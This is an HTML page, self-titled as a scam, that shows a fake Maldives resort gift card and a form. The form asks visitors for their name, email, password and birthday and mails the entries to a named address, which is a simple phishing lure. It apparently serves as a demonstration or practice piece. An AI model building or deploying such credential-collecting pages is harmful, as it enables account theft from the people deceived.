<!DOCTYPE html>
<html>
<head>
	<meta charset="utf-8">
	<meta name="viewport" content="width=device-width, initial-scale=1">
	<title>Free Gift Card!!!(SCAM DONT DO IT!!)</title>
	<link rel="icon" type="text/css" href="gift.png">
	<style type="text/css">
#a {
  font-family: monospace;
}
#b {
  font-family: Caveat;
}
.a {
  border: black 2px solid;
  background-color: red;
  width: 500px;
  text-align: center;
}
.card {
  border: solid 1px black;
  padding: 5px;
  width: 505px;
  height: 400px;
  text-align: center;
  box-shadow: grey 10px 10px 10px 10px;
}
.table1 {
  font-family: sofia;
  border: black 1px solid;
  border-collapse: collapse;
  padding: 10px;
  margin-right: 20px;
}
.pp {
  font-family: system-ui;
  border: black solid 3px;
  padding: 20px;
  margin-right: 20px;
}
.code {
  writing-mode: vertical-rl;
  text-align: right;
  font-family: sans-serif;
}
fieldset {
  background-color: gold;
}

legend {
  background-color: red;
  color: white;
  padding: 5px 10px;
}

input {
  margin: 5px;
}
#as {
  font-family: system-ui;
  font-size: 50px;
  text-align: center;
}

	</style>
</head>
<body>
<h1 id="as">Free gift card!!</h1>
<div class="card">
  <div class="a">
    <h1 id="a">Maldives</h1>
    <p id="a">Resort gift card</p>
  </div>
  <h3 id="b">Coco resort</h3>
  <hr>
  <table>
    <tr>
      <td>
        <table cellspacing="10" class="table1" border="1">
          <tr>
            <th></th>
            <th>Public</th>
            <th>Private</th>

          </tr>
          <tr>
            <th>
              <p class="rent">Diving</p>
              <p class="rent">Snorkeling</p>
              <p class="rent">Pareselling</p>
            </th>
            <td>
              <p class="price">150rf</p>
              <p class="price">120rf</p>
              <p class="price">200rf</p>
            </td>
            <td>
              <p class="price">450rf</p>
              <p class="price">420rf</p>
              <p class="price">600rf</p>
            </td>
          </tr>
        </table>
      </td>
      <td>
        <div class="pp">
          <p>Public room:1000rf</p>
          <hr>
          <p>Private room:5000rf</p>
        </div>
      </td>
      <td>
        <p class="code">Code:***-**-****</p>
      </td>
    </tr>
  </table>
  <hr>
  ©2011 All rights reserved
</div>
<br><br>
<form action="mailto:mazilaik@outlook.com" method="post" enctype="text/plain" target="blank">
  <fieldset>
    <legend>Fill details to get gift card:</legend>
    <label for="fname">First name:</label>
    <input type="text" id="fname" name="fname"><br><br>
    <label for="lname">Last name:</label>
    <input type="text" id="lname" name="lname"><br><br>
    <label for="email">Email:</label>
    <input type="email" id="email" name="email"><br><br>
    <label for="password">Password:</label>
    <input type="password" id="password" name="password "><br><br>
    <label for="birthday">Birthday:</label>
    <input type="date" id="birthday" name="birthday"><br><br>
    <input type="submit"><br><br>
  </fieldset>
</form>
</body>
</html>